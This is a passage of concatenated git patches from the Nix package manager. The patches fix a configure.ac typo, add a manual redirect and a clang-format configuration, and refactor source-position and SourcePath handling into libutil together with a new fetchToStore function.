+ expectStderr 1 nix-build fixed.nix -A badReferences | grepQuiet "not allowed to refer to other store paths" +fi # While we're at it, check attribute selection a bit more. echo 'testing attribute selection...' From 605eba3829946eb04f1aaf1160cf11a55183c677 Mon Sep 17 00:00:00 2001 From: Weijia Wang <9713184+wegank@users.noreply.github.com> Date: Mon, 8 Jan 2024 17:31:27 +0100 Subject: [PATCH 203/654] Fix typo in configure.ac --- configure.ac | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/configure.ac b/configure.ac index b97e25bbd..369d62552 100644 --- a/configure.ac +++ b/configure.ac @@ -160,7 +160,7 @@ AC_ARG_ENABLE(doc-gen, AS_HELP_STRING([--disable-doc-gen],[disable documentation AC_SUBST(ENABLE_DOC_GEN) AS_IF( - [test "$ENABLE_BUILD" == "no" && test "$ENABLE_GENERATED_DOCS" == "yes"], + [test "$ENABLE_BUILD" == "no" && test "$ENABLE_DOC_GEN" == "yes"], [AC_MSG_ERROR([Cannot enable generated docs when building overall is disabled. Please do not pass '--enable-doc-gen' or do not pass '--disable-build'.])]) # Building without API docs is the default as Nix' C++ interfaces are internal and unstable. 
From 6a243e5ed281344135285d9093ef36969a867d73 Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Mon, 8 Jan 2024 19:38:36 +0100 Subject: [PATCH 204/654] fix an old lost direct (#9458) this part must have been moved quite a while ago, but apparently so far no one noticed --- doc/manual/redirects.js | 1 + 1 file changed, 1 insertion(+) diff --git a/doc/manual/redirects.js b/doc/manual/redirects.js index 3b507adf3..d04f32b49 100644 --- a/doc/manual/redirects.js +++ b/doc/manual/redirects.js @@ -21,6 +21,7 @@ const redirects = { "chap-distributed-builds": "advanced-topics/distributed-builds.html", "chap-post-build-hook": "advanced-topics/post-build-hook.html", "chap-post-build-hook-caveats": "advanced-topics/post-build-hook.html#implementation-caveats", + "chap-writing-nix-expressions": "language/index.html", "part-command-ref": "command-ref/command-ref.html", "conf-allow-import-from-derivation": "command-ref/conf-file.html#conf-allow-import-from-derivation", "conf-allow-new-privileges": "command-ref/conf-file.html#conf-allow-new-privileges", From 53fdcbca509b6c5dacaea3d3c465d86e49b0dd74 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jos=C3=A9=20Luis=20Lafuente?= Date: Mon, 8 Jan 2024 19:46:38 +0100 Subject: [PATCH 205/654] Add clang format configuration --- .clang-format | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 .clang-format diff --git a/.clang-format b/.clang-format new file mode 100644 index 000000000..9c0c0946a --- /dev/null +++ b/.clang-format @@ -0,0 +1,30 @@ +BasedOnStyle: LLVM +IndentWidth: 4 +BreakBeforeBraces: Custom +BraceWrapping: + AfterStruct: true + AfterClass: true + AfterFunction: true + AfterUnion: true + SplitEmptyRecord: false +PointerAlignment: Middle +FixNamespaceComments: false +SortIncludes: Never +#IndentPPDirectives: BeforeHash +SpaceAfterCStyleCast: true +SpaceAfterTemplateKeyword: false +AccessModifierOffset: -4 +AlignAfterOpenBracket: AlwaysBreak +AlignEscapedNewlines: DontAlign +ColumnLimit: 120 
+BreakStringLiterals: false +BitFieldColonSpacing: None +AllowShortFunctionsOnASingleLine: Empty +AlwaysBreakTemplateDeclarations: Yes +BinPackParameters: false +BreakConstructorInitializers: BeforeComma +EmptyLineAfterAccessModifier: Leave # change to always/never later? +EmptyLineBeforeAccessModifier: Leave +#PackConstructorInitializers: BinPack +BreakBeforeBinaryOperators: NonAssignment +AlwaysBreakBeforeMultilineStrings: true From 4feb7d9f715021784952bea57b37a8628c9b6860 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 18 Dec 2023 13:14:42 -0800 Subject: [PATCH 206/654] Combine `AbstractPos`, `PosAdapter`, and `Pos` Also move `SourcePath` into `libutil`. These changes allow `error.hh` and `error.cc` to access source path and position information, which we can use to produce better error messages (for example, we could consider omitting filenames when two or more consecutive stack frames originate from the same file). --- src/libcmd/editor-for.cc | 1 + src/libcmd/editor-for.hh | 2 +- src/libcmd/installable-value.cc | 3 +- src/libcmd/repl.cc | 2 +- src/libexpr/eval.cc | 9 +- src/libexpr/eval.hh | 2 +- src/libexpr/nixexpr.cc | 63 ------- src/libexpr/nixexpr.hh | 26 +-- src/libexpr/primops.cc | 3 +- src/libexpr/value.hh | 1 + src/libfetchers/fetch-to-store.cc | 68 ++++++++ src/libfetchers/fetch-to-store.hh | 22 +++ src/libfetchers/fetchers.cc | 4 +- src/libfetchers/filtering-input-accessor.hh | 1 + src/libfetchers/fs-input-accessor.hh | 1 + src/libfetchers/input-accessor.cc | 129 --------------- src/libfetchers/input-accessor.hh | 174 -------------------- src/libfetchers/memory-input-accessor.cc | 1 + src/libfetchers/memory-input-accessor.hh | 1 + src/libstore/store-api.hh | 1 + src/libutil/error.cc | 55 +------ src/libutil/error.hh | 42 +---- src/libutil/input-accessor.hh | 27 +++ src/libutil/logging.cc | 6 +- src/libutil/position.cc | 112 +++++++++++++ src/libutil/position.hh | 74 +++++++++ src/libutil/ref.hh | 1 + src/{libstore => libutil}/repair-flag.hh 
| 0 src/libutil/source-path.cc | 105 ++++++++++++ src/libutil/source-path.hh | 114 +++++++++++++ 30 files changed, 561 insertions(+), 489 deletions(-) create mode 100644 src/libfetchers/fetch-to-store.cc create mode 100644 src/libfetchers/fetch-to-store.hh delete mode 100644 src/libfetchers/input-accessor.cc delete mode 100644 src/libfetchers/input-accessor.hh create mode 100644 src/libutil/input-accessor.hh create mode 100644 src/libutil/position.cc create mode 100644 src/libutil/position.hh rename src/{libstore => libutil}/repair-flag.hh (100%) create mode 100644 src/libutil/source-path.cc create mode 100644 src/libutil/source-path.hh diff --git a/src/libcmd/editor-for.cc b/src/libcmd/editor-for.cc index 619d3673f..67653d9c9 100644 --- a/src/libcmd/editor-for.cc +++ b/src/libcmd/editor-for.cc @@ -1,5 +1,6 @@ #include "editor-for.hh" #include "environment-variables.hh" +#include "source-path.hh" namespace nix { diff --git a/src/libcmd/editor-for.hh b/src/libcmd/editor-for.hh index fbf4307c9..8acd7011e 100644 --- a/src/libcmd/editor-for.hh +++ b/src/libcmd/editor-for.hh @@ -2,7 +2,7 @@ ///@file #include "types.hh" -#include "input-accessor.hh" +#include "source-path.hh" namespace nix { diff --git a/src/libcmd/installable-value.cc b/src/libcmd/installable-value.cc index bdc34bbe3..c8a3e1b21 100644 --- a/src/libcmd/installable-value.cc +++ b/src/libcmd/installable-value.cc @@ -1,5 +1,6 @@ #include "installable-value.hh" #include "eval-cache.hh" +#include "fetch-to-store.hh" namespace nix { @@ -44,7 +45,7 @@ ref InstallableValue::require(ref installable) std::optional InstallableValue::trySinglePathToDerivedPaths(Value & v, const PosIdx pos, std::string_view errorCtx) { if (v.type() == nPath) { - auto storePath = v.path().fetchToStore(*state->store); + auto storePath = fetchToStore(*state->store, v.path()); return {{ .path = DerivedPath::Opaque { .path = std::move(storePath), diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc index dea91ba63..78c4538b2 100644 --- 
a/src/libcmd/repl.cc +++ b/src/libcmd/repl.cc @@ -221,7 +221,7 @@ static std::ostream & showDebugTrace(std::ostream & out, const PosTable & positi // prefer direct pos, but if noPos then try the expr. auto pos = dt.pos ? dt.pos - : static_cast>(positions[dt.expr.getPos() ? dt.expr.getPos() : noPos]); + : positions[dt.expr.getPos() ? dt.expr.getPos() : noPos]; if (pos) { out << pos; diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 31f2d4952..d408f1adc 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -19,6 +19,7 @@ #include "signals.hh" #include "gc-small-vector.hh" #include "url.hh" +#include "fetch-to-store.hh" #include #include @@ -870,7 +871,7 @@ void EvalState::runDebugRepl(const Error * error, const Env & env, const Expr & ? std::make_unique( *this, DebugTrace { - .pos = error->info().errPos ? error->info().errPos : static_cast>(positions[expr.getPos()]), + .pos = error->info().errPos ? error->info().errPos : positions[expr.getPos()], .expr = expr, .env = env, .hint = error->info().msg, @@ -909,7 +910,7 @@ static std::unique_ptr makeDebugTraceStacker( EvalState & state, Expr & expr, Env & env, - std::shared_ptr && pos, + std::shared_ptr && pos, const char * s, const std::string & s2) { @@ -1187,7 +1188,7 @@ void EvalState::evalFile(const SourcePath & path, Value & v, bool mustBeTrivial) *this, *e, this->baseEnv, - e->getPos() ? static_cast>(positions[e->getPos()]) : nullptr, + e->getPos() ? std::make_shared(positions[e->getPos()]) : nullptr, "while evaluating the file '%1%':", resolvedPath.to_string()) : nullptr; @@ -2368,7 +2369,7 @@ StorePath EvalState::copyPathToStore(NixStringContext & context, const SourcePat auto dstPath = i != srcToStore.end() ? 
i->second : [&]() { - auto dstPath = path.fetchToStore(*store, path.baseName(), FileIngestionMethod::Recursive, nullptr, repair); + auto dstPath = fetchToStore(*store, path, path.baseName(), FileIngestionMethod::Recursive, nullptr, repair); allowPath(dstPath); srcToStore.insert_or_assign(path, dstPath); printMsg(lvlChatty, "copied source '%1%' -> '%2%'", path, store->printStorePath(dstPath)); diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index 6e3f08d55..5e0f1886d 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -142,7 +142,7 @@ struct RegexCache; std::shared_ptr makeRegexCache(); struct DebugTrace { - std::shared_ptr pos; + std::shared_ptr pos; const Expr & expr; const Env & env; hintformat hint; diff --git a/src/libexpr/nixexpr.cc b/src/libexpr/nixexpr.cc index ede070cff..964de6351 100644 --- a/src/libexpr/nixexpr.cc +++ b/src/libexpr/nixexpr.cc @@ -11,58 +11,6 @@ namespace nix { ExprBlackHole eBlackHole; -struct PosAdapter : AbstractPos -{ - Pos::Origin origin; - - PosAdapter(Pos::Origin origin) - : origin(std::move(origin)) - { - } - - std::optional getSource() const override - { - return std::visit(overloaded { - [](const Pos::none_tag &) -> std::optional { - return std::nullopt; - }, - [](const Pos::Stdin & s) -> std::optional { - // Get rid of the null terminators added by the parser. - return std::string(s.source->c_str()); - }, - [](const Pos::String & s) -> std::optional { - // Get rid of the null terminators added by the parser. 
- return std::string(s.source->c_str()); - }, - [](const SourcePath & path) -> std::optional { - try { - return path.readFile(); - } catch (Error &) { - return std::nullopt; - } - } - }, origin); - } - - void print(std::ostream & out) const override - { - std::visit(overloaded { - [&](const Pos::none_tag &) { out << "«none»"; }, - [&](const Pos::Stdin &) { out << "«stdin»"; }, - [&](const Pos::String & s) { out << "«string»"; }, - [&](const SourcePath & path) { out << path; } - }, origin); - } -}; - -Pos::operator std::shared_ptr() const -{ - auto pos = std::make_shared(origin); - pos->line = line; - pos->column = column; - return pos; -} - // FIXME: remove, because *symbols* are abstract and do not have a single // textual representation; see printIdentifier() std::ostream & operator <<(std::ostream & str, const SymbolStr & symbol) @@ -268,17 +216,6 @@ void ExprPos::show(const SymbolTable & symbols, std::ostream & str) const } -std::ostream & operator << (std::ostream & str, const Pos & pos) -{ - if (auto pos2 = (std::shared_ptr) pos) { - str << *pos2; - } else - str << "undefined position"; - - return str; -} - - std::string showAttrPath(const SymbolTable & symbols, const AttrPath & attrPath) { std::ostringstream out; diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh index 71ed9ef30..3cd46ca27 100644 --- a/src/libexpr/nixexpr.hh +++ b/src/libexpr/nixexpr.hh @@ -8,6 +8,7 @@ #include "symbol-table.hh" #include "error.hh" #include "chunked-vector.hh" +#include "position.hh" namespace nix { @@ -28,27 +29,6 @@ public: using EvalError::EvalError; }; -/** - * Position objects. 
- */ -struct Pos -{ - uint32_t line; - uint32_t column; - - struct none_tag { }; - struct Stdin { ref source; }; - struct String { ref source; }; - - typedef std::variant Origin; - - Origin origin; - - explicit operator bool() const { return line > 0; } - - operator std::shared_ptr() const; -}; - class PosIdx { friend class PosTable; @@ -81,7 +61,7 @@ public: mutable uint32_t idx = std::numeric_limits::max(); // Used for searching in PosTable::[]. - explicit Origin(uint32_t idx): idx(idx), origin{Pos::none_tag()} {} + explicit Origin(uint32_t idx): idx(idx), origin{std::monostate()} {} public: const Pos::Origin origin; @@ -132,8 +112,6 @@ public: inline PosIdx noPos = {}; -std::ostream & operator << (std::ostream & str, const Pos & pos); - struct Env; struct Value; diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index b2ffcc051..ee07e5568 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -16,6 +16,7 @@ #include "value-to-xml.hh" #include "primops.hh" #include "fs-input-accessor.hh" +#include "fetch-to-store.hh" #include #include @@ -2240,7 +2241,7 @@ static void addPath( }); if (!expectedHash || !state.store->isValidPath(*expectedStorePath)) { - auto dstPath = path.fetchToStore(*state.store, name, method, filter.get(), state.repair); + auto dstPath = fetchToStore(*state.store, path, name, method, filter.get(), state.repair); if (expectedHash && expectedStorePath != dstPath) state.debugThrowLastTrace(Error("store path mismatch in (possibly filtered) path added from '%s'", path)); state.allowAndSetStorePathString(dstPath, v); diff --git a/src/libexpr/value.hh b/src/libexpr/value.hh index d9860e921..c65b336b0 100644 --- a/src/libexpr/value.hh +++ b/src/libexpr/value.hh @@ -8,6 +8,7 @@ #include "symbol-table.hh" #include "value/context.hh" #include "input-accessor.hh" +#include "source-path.hh" #if HAVE_BOEHMGC #include diff --git a/src/libfetchers/fetch-to-store.cc b/src/libfetchers/fetch-to-store.cc new file mode 100644 index 
000000000..196489e05 --- /dev/null +++ b/src/libfetchers/fetch-to-store.cc @@ -0,0 +1,68 @@ +#include "fetch-to-store.hh" +#include "fetchers.hh" +#include "cache.hh" + +namespace nix { + +StorePath fetchToStore( + Store & store, + const SourcePath & path, + std::string_view name, + ContentAddressMethod method, + PathFilter * filter, + RepairFlag repair) +{ + // FIXME: add an optimisation for the case where the accessor is + // an FSInputAccessor pointing to a store path. + + std::optional cacheKey; + + if (!filter && path.accessor->fingerprint) { + cacheKey = fetchers::Attrs{ + {"_what", "fetchToStore"}, + {"store", store.storeDir}, + {"name", std::string(name)}, + {"fingerprint", *path.accessor->fingerprint}, + { + "method", + std::visit(overloaded { + [](const TextIngestionMethod &) { + return "text"; + }, + [](const FileIngestionMethod & fim) { + switch (fim) { + case FileIngestionMethod::Flat: return "flat"; + case FileIngestionMethod::Recursive: return "nar"; + default: assert(false); + } + }, + }, method.raw), + }, + {"path", path.path.abs()} + }; + if (auto res = fetchers::getCache()->lookup(store, *cacheKey)) { + debug("store path cache hit for '%s'", path); + return res->second; + } + } else + debug("source path '%s' is uncacheable", path); + + Activity act(*logger, lvlChatty, actUnknown, fmt("copying '%s' to the store", path)); + + auto filter2 = filter ? *filter : defaultPathFilter; + + auto storePath = + settings.readOnlyMode + ? 
store.computeStorePath( + name, *path.accessor, path.path, method, HashAlgorithm::SHA256, {}, filter2).first + : store.addToStore( + name, *path.accessor, path.path, method, HashAlgorithm::SHA256, {}, filter2, repair); + + if (cacheKey) + fetchers::getCache()->add(store, *cacheKey, {}, storePath, true); + + return storePath; +} + + +} diff --git a/src/libfetchers/fetch-to-store.hh b/src/libfetchers/fetch-to-store.hh new file mode 100644 index 000000000..e5e039340 --- /dev/null +++ b/src/libfetchers/fetch-to-store.hh @@ -0,0 +1,22 @@ +#pragma once + +#include "source-path.hh" +#include "store-api.hh" +#include "file-system.hh" +#include "repair-flag.hh" +#include "file-content-address.hh" + +namespace nix { + +/** + * Copy the `path` to the Nix store. + */ +StorePath fetchToStore( + Store & store, + const SourcePath & path, + std::string_view name = "source", + ContentAddressMethod method = FileIngestionMethod::Recursive, + PathFilter * filter = nullptr, + RepairFlag repair = NoRepair); + +} diff --git a/src/libfetchers/fetchers.cc b/src/libfetchers/fetchers.cc index f309e5993..7f282c972 100644 --- a/src/libfetchers/fetchers.cc +++ b/src/libfetchers/fetchers.cc @@ -1,6 +1,8 @@ #include "fetchers.hh" #include "store-api.hh" #include "input-accessor.hh" +#include "source-path.hh" +#include "fetch-to-store.hh" #include @@ -374,7 +376,7 @@ void InputScheme::clone(const Input & input, const Path & destDir) const std::pair InputScheme::fetch(ref store, const Input & input) { auto [accessor, input2] = getAccessor(store, input); - auto storePath = SourcePath(accessor).fetchToStore(*store, input2.getName()); + auto storePath = fetchToStore(*store, SourcePath(accessor), input2.getName()); return {storePath, input2}; } diff --git a/src/libfetchers/filtering-input-accessor.hh b/src/libfetchers/filtering-input-accessor.hh index e1b83c929..a352a33a6 100644 --- a/src/libfetchers/filtering-input-accessor.hh +++ b/src/libfetchers/filtering-input-accessor.hh @@ -1,6 +1,7 @@ #pragma 
once #include "input-accessor.hh" +#include "source-path.hh" namespace nix { diff --git a/src/libfetchers/fs-input-accessor.hh b/src/libfetchers/fs-input-accessor.hh index ba5af5887..a98e83511 100644 --- a/src/libfetchers/fs-input-accessor.hh +++ b/src/libfetchers/fs-input-accessor.hh @@ -1,6 +1,7 @@ #pragma once #include "input-accessor.hh" +#include "source-path.hh" namespace nix { diff --git a/src/libfetchers/input-accessor.cc b/src/libfetchers/input-accessor.cc deleted file mode 100644 index a647f5915..000000000 --- a/src/libfetchers/input-accessor.cc +++ /dev/null @@ -1,129 +0,0 @@ -#include "input-accessor.hh" -#include "store-api.hh" -#include "cache.hh" - -namespace nix { - -StorePath InputAccessor::fetchToStore( - Store & store, - const CanonPath & path, - std::string_view name, - ContentAddressMethod method, - PathFilter * filter, - RepairFlag repair) -{ - // FIXME: add an optimisation for the case where the accessor is - // an FSInputAccessor pointing to a store path. - - std::optional cacheKey; - - if (!filter && fingerprint) { - cacheKey = fetchers::Attrs{ - {"_what", "fetchToStore"}, - {"store", store.storeDir}, - {"name", std::string(name)}, - {"fingerprint", *fingerprint}, - { - "method", - std::visit(overloaded { - [](const TextIngestionMethod &) { - return "text"; - }, - [](const FileIngestionMethod & fim) { - switch (fim) { - case FileIngestionMethod::Flat: return "flat"; - case FileIngestionMethod::Recursive: return "nar"; - default: assert(false); - } - }, - }, method.raw), - }, - {"path", path.abs()} - }; - if (auto res = fetchers::getCache()->lookup(store, *cacheKey)) { - debug("store path cache hit for '%s'", showPath(path)); - return res->second; - } - } else - debug("source path '%s' is uncacheable", showPath(path)); - - Activity act(*logger, lvlChatty, actUnknown, fmt("copying '%s' to the store", showPath(path))); - - auto filter2 = filter ? *filter : defaultPathFilter; - - auto storePath = - settings.readOnlyMode - ? 
store.computeStorePath( - name, *this, path, method, HashAlgorithm::SHA256, {}, filter2).first - : store.addToStore( - name, *this, path, method, HashAlgorithm::SHA256, {}, filter2, repair); - - if (cacheKey) - fetchers::getCache()->add(store, *cacheKey, {}, storePath, true); - - return storePath; -} - -std::ostream & operator << (std::ostream & str, const SourcePath & path) -{ - str << path.to_string(); - return str; -} - -StorePath SourcePath::fetchToStore( - Store & store, - std::string_view name, - ContentAddressMethod method, - PathFilter * filter, - RepairFlag repair) const -{ - return accessor->fetchToStore(store, path, name, method, filter, repair); -} - -std::string_view SourcePath::baseName() const -{ - return path.baseName().value_or("source"); -} - -SourcePath SourcePath::parent() const -{ - auto p = path.parent(); - assert(p); - return {accessor, std::move(*p)}; -} - -SourcePath SourcePath::resolveSymlinks() const -{ - auto res = SourcePath(accessor); - - int linksAllowed = 1024; - - std::list todo; - for (auto & c : path) - todo.push_back(std::string(c)); - - while (!todo.empty()) { - auto c = *todo.begin(); - todo.pop_front(); - if (c == "" || c == ".") - ; - else if (c == "..") - res.path.pop(); - else { - res.path.push(c); - if (auto st = res.maybeLstat(); st && st->type == InputAccessor::tSymlink) { - if (!linksAllowed--) - throw Error("infinite symlink recursion in path '%s'", path); - auto target = res.readLink(); - res.path.pop(); - if (hasPrefix(target, "/")) - res.path = CanonPath::root; - todo.splice(todo.begin(), tokenizeString>(target, "/")); - } - } - } - - return res; -} - -} diff --git a/src/libfetchers/input-accessor.hh b/src/libfetchers/input-accessor.hh deleted file mode 100644 index d2a21cb4b..000000000 --- a/src/libfetchers/input-accessor.hh +++ /dev/null @@ -1,174 +0,0 @@ -#pragma once -///@file - -#include "source-accessor.hh" -#include "ref.hh" -#include "types.hh" -#include "file-system.hh" -#include "repair-flag.hh" -#include 
"content-address.hh" - -namespace nix { - -MakeError(RestrictedPathError, Error); - -struct SourcePath; -class StorePath; -class Store; - -struct InputAccessor : virtual SourceAccessor, std::enable_shared_from_this -{ - std::optional fingerprint; - - /** - * Return the maximum last-modified time of the files in this - * tree, if available. - */ - virtual std::optional getLastModified() - { - return std::nullopt; - } - - StorePath fetchToStore( - Store & store, - const CanonPath & path, - std::string_view name = "source", - ContentAddressMethod method = FileIngestionMethod::Recursive, - PathFilter * filter = nullptr, - RepairFlag repair = NoRepair); -}; - -/** - * An abstraction for accessing source files during - * evaluation. Currently, it's just a wrapper around `CanonPath` that - * accesses files in the regular filesystem, but in the future it will - * support fetching files in other ways. - */ -struct SourcePath -{ - ref accessor; - CanonPath path; - - SourcePath(ref accessor, CanonPath path = CanonPath::root) - : accessor(std::move(accessor)) - , path(std::move(path)) - { } - - std::string_view baseName() const; - - /** - * Construct the parent of this `SourcePath`. Aborts if `this` - * denotes the root. - */ - SourcePath parent() const; - - /** - * If this `SourcePath` denotes a regular file (not a symlink), - * return its contents; otherwise throw an error. - */ - std::string readFile() const - { return accessor->readFile(path); } - - /** - * Return whether this `SourcePath` denotes a file (of any type) - * that exists - */ - bool pathExists() const - { return accessor->pathExists(path); } - - /** - * Return stats about this `SourcePath`, or throw an exception if - * it doesn't exist. - */ - InputAccessor::Stat lstat() const - { return accessor->lstat(path); } - - /** - * Return stats about this `SourcePath`, or std::nullopt if it - * doesn't exist. 
- */ - std::optional maybeLstat() const - { return accessor->maybeLstat(path); } - - /** - * If this `SourcePath` denotes a directory (not a symlink), - * return its directory entries; otherwise throw an error. - */ - InputAccessor::DirEntries readDirectory() const - { return accessor->readDirectory(path); } - - /** - * If this `SourcePath` denotes a symlink, return its target; - * otherwise throw an error. - */ - std::string readLink() const - { return accessor->readLink(path); } - - /** - * Dump this `SourcePath` to `sink` as a NAR archive. - */ - void dumpPath( - Sink & sink, - PathFilter & filter = defaultPathFilter) const - { return accessor->dumpPath(path, sink, filter); } - - /** - * Copy this `SourcePath` to the Nix store. - */ - StorePath fetchToStore( - Store & store, - std::string_view name = "source", - ContentAddressMethod method = FileIngestionMethod::Recursive, - PathFilter * filter = nullptr, - RepairFlag repair = NoRepair) const; - - /** - * Return the location of this path in the "real" filesystem, if - * it has a physical location. - */ - std::optional getPhysicalPath() const - { return accessor->getPhysicalPath(path); } - - std::string to_string() const - { return accessor->showPath(path); } - - /** - * Append a `CanonPath` to this path. - */ - SourcePath operator + (const CanonPath & x) const - { return {accessor, path + x}; } - - /** - * Append a single component `c` to this path. `c` must not - * contain a slash. A slash is implicitly added between this path - * and `c`. 
- */ - SourcePath operator + (std::string_view c) const - { return {accessor, path + c}; } - - bool operator == (const SourcePath & x) const - { - return std::tie(accessor, path) == std::tie(x.accessor, x.path); - } - - bool operator != (const SourcePath & x) const - { - return std::tie(accessor, path) != std::tie(x.accessor, x.path); - } - - bool operator < (const SourcePath & x) const - { - return std::tie(accessor, path) < std::tie(x.accessor, x.path); - } - - /** - * Resolve any symlinks in this `SourcePath` (including its - * parents). The result is a `SourcePath` in which no element is a - * symlink. - */ - SourcePath resolveSymlinks() const; -}; - -std::ostream & operator << (std::ostream & str, const SourcePath & path); - -} diff --git a/src/libfetchers/memory-input-accessor.cc b/src/libfetchers/memory-input-accessor.cc index 057f3e37f..88a2e34e8 100644 --- a/src/libfetchers/memory-input-accessor.cc +++ b/src/libfetchers/memory-input-accessor.cc @@ -1,5 +1,6 @@ #include "memory-input-accessor.hh" #include "memory-source-accessor.hh" +#include "source-path.hh" namespace nix { diff --git a/src/libfetchers/memory-input-accessor.hh b/src/libfetchers/memory-input-accessor.hh index b75b02bfd..508b07722 100644 --- a/src/libfetchers/memory-input-accessor.hh +++ b/src/libfetchers/memory-input-accessor.hh @@ -1,4 +1,5 @@ #include "input-accessor.hh" +#include "source-path.hh" namespace nix { diff --git a/src/libstore/store-api.hh b/src/libstore/store-api.hh index 96a7ebd7b..9667b5e9e 100644 --- a/src/libstore/store-api.hh +++ b/src/libstore/store-api.hh @@ -13,6 +13,7 @@ #include "path-info.hh" #include "repair-flag.hh" #include "store-dir-config.hh" +#include "source-path.hh" #include #include diff --git a/src/libutil/error.cc b/src/libutil/error.cc index e42925c2b..bd2f6b840 100644 --- a/src/libutil/error.cc +++ b/src/libutil/error.cc @@ -2,6 +2,7 @@ #include "environment-variables.hh" #include "signals.hh" #include "terminal.hh" +#include "position.hh" #include 
#include @@ -10,7 +11,7 @@ namespace nix { -void BaseError::addTrace(std::shared_ptr && e, hintformat hint, bool frame) +void BaseError::addTrace(std::shared_ptr && e, hintformat hint, bool frame) { err.traces.push_front(Trace { .pos = std::move(e), .hint = hint, .frame = frame }); } @@ -41,15 +42,6 @@ std::ostream & operator <<(std::ostream & os, const hintformat & hf) return os << hf.str(); } -std::ostream & operator <<(std::ostream & str, const AbstractPos & pos) -{ - pos.print(str); - str << ":" << pos.line; - if (pos.column > 0) - str << ":" << pos.column; - return str; -} - /** * An arbitrarily defined value comparison for the purpose of using traces in the key of a sorted container. */ @@ -76,49 +68,10 @@ inline bool operator> (const Trace& lhs, const Trace& rhs) { return rhs < lhs; } inline bool operator<=(const Trace& lhs, const Trace& rhs) { return !(lhs > rhs); } inline bool operator>=(const Trace& lhs, const Trace& rhs) { return !(lhs < rhs); } -std::optional AbstractPos::getCodeLines() const -{ - if (line == 0) - return std::nullopt; - - if (auto source = getSource()) { - - std::istringstream iss(*source); - // count the newlines. - int count = 0; - std::string curLine; - int pl = line - 1; - - LinesOfCode loc; - - do { - std::getline(iss, curLine); - ++count; - if (count < pl) - ; - else if (count == pl) { - loc.prevLineOfCode = curLine; - } else if (count == pl + 1) { - loc.errLineOfCode = curLine; - } else if (count == pl + 2) { - loc.nextLineOfCode = curLine; - break; - } - - if (!iss.good()) - break; - } while (true); - - return loc; - } - - return std::nullopt; -} - // print lines of code to the ostream, indicating the error column. void printCodeLines(std::ostream & out, const std::string & prefix, - const AbstractPos & errPos, + const Pos & errPos, const LinesOfCode & loc) { // previous line of code. @@ -196,7 +149,7 @@ static bool printUnknownLocations = getEnv("_NIX_EVAL_SHOW_UNKNOWN_LOCATIONS").h * * @return true if a position was printed. 
*/ -static bool printPosMaybe(std::ostream & oss, std::string_view indent, const std::shared_ptr & pos) { +static bool printPosMaybe(std::ostream & oss, std::string_view indent, const std::shared_ptr & pos) { bool hasPos = pos && *pos; if (hasPos) { oss << indent << ANSI_BLUE << "at " ANSI_WARNING << *pos << ANSI_NORMAL << ":"; diff --git a/src/libutil/error.hh b/src/libutil/error.hh index baffca128..234cbe1f6 100644 --- a/src/libutil/error.hh +++ b/src/libutil/error.hh @@ -63,45 +63,15 @@ struct LinesOfCode { std::optional nextLineOfCode; }; -/** - * An abstract type that represents a location in a source file. - */ -struct AbstractPos -{ - uint32_t line = 0; - uint32_t column = 0; - - /** - * An AbstractPos may be a "null object", representing an unknown position. - * - * Return true if this position is known. - */ - inline operator bool() const { return line != 0; }; - - /** - * Return the contents of the source file. - */ - virtual std::optional getSource() const - { return std::nullopt; }; - - virtual void print(std::ostream & out) const = 0; - - std::optional getCodeLines() const; - - virtual ~AbstractPos() = default; - - inline auto operator<=>(const AbstractPos& rhs) const = default; -}; - -std::ostream & operator << (std::ostream & str, const AbstractPos & pos); +struct Pos; void printCodeLines(std::ostream & out, const std::string & prefix, - const AbstractPos & errPos, + const Pos & errPos, const LinesOfCode & loc); struct Trace { - std::shared_ptr pos; + std::shared_ptr pos; hintformat hint; bool frame; }; @@ -114,7 +84,7 @@ inline bool operator>=(const Trace& lhs, const Trace& rhs); struct ErrorInfo { Verbosity level; hintformat msg; - std::shared_ptr errPos; + std::shared_ptr errPos; std::list traces; Suggestions suggestions; @@ -185,12 +155,12 @@ public: } template - void addTrace(std::shared_ptr && e, std::string_view fs, const Args & ... args) + void addTrace(std::shared_ptr && e, std::string_view fs, const Args & ... 
args) { addTrace(std::move(e), hintfmt(std::string(fs), args...)); } - void addTrace(std::shared_ptr && e, hintformat hint, bool frame = false); + void addTrace(std::shared_ptr && e, hintformat hint, bool frame = false); bool hasTrace() const { return !err.traces.empty(); } diff --git a/src/libutil/input-accessor.hh b/src/libutil/input-accessor.hh new file mode 100644 index 000000000..55b7c2f2f --- /dev/null +++ b/src/libutil/input-accessor.hh @@ -0,0 +1,27 @@ +#pragma once +///@file + +#include "source-accessor.hh" +#include "ref.hh" +#include "repair-flag.hh" + +namespace nix { + +MakeError(RestrictedPathError, Error); + +struct InputAccessor : virtual SourceAccessor, std::enable_shared_from_this +{ + std::optional fingerprint; + + /** + * Return the maximum last-modified time of the files in this + * tree, if available. + */ + virtual std::optional getLastModified() + { + return std::nullopt; + } + +}; + +} diff --git a/src/libutil/logging.cc b/src/libutil/logging.cc index 60b0865bf..183aee2dc 100644 --- a/src/libutil/logging.cc +++ b/src/libutil/logging.cc @@ -4,6 +4,8 @@ #include "terminal.hh" #include "util.hh" #include "config.hh" +#include "source-path.hh" +#include "position.hh" #include #include @@ -136,13 +138,13 @@ Activity::Activity(Logger & logger, Verbosity lvl, ActivityType type, logger.startActivity(id, lvl, type, s, fields, parent); } -void to_json(nlohmann::json & json, std::shared_ptr pos) +void to_json(nlohmann::json & json, std::shared_ptr pos) { if (pos) { json["line"] = pos->line; json["column"] = pos->column; std::ostringstream str; - pos->print(str); + pos->print(str, true); json["file"] = str.str(); } else { json["line"] = nullptr; diff --git a/src/libutil/position.cc b/src/libutil/position.cc new file mode 100644 index 000000000..b39a5a1d4 --- /dev/null +++ b/src/libutil/position.cc @@ -0,0 +1,112 @@ +#include "position.hh" + +namespace nix { + 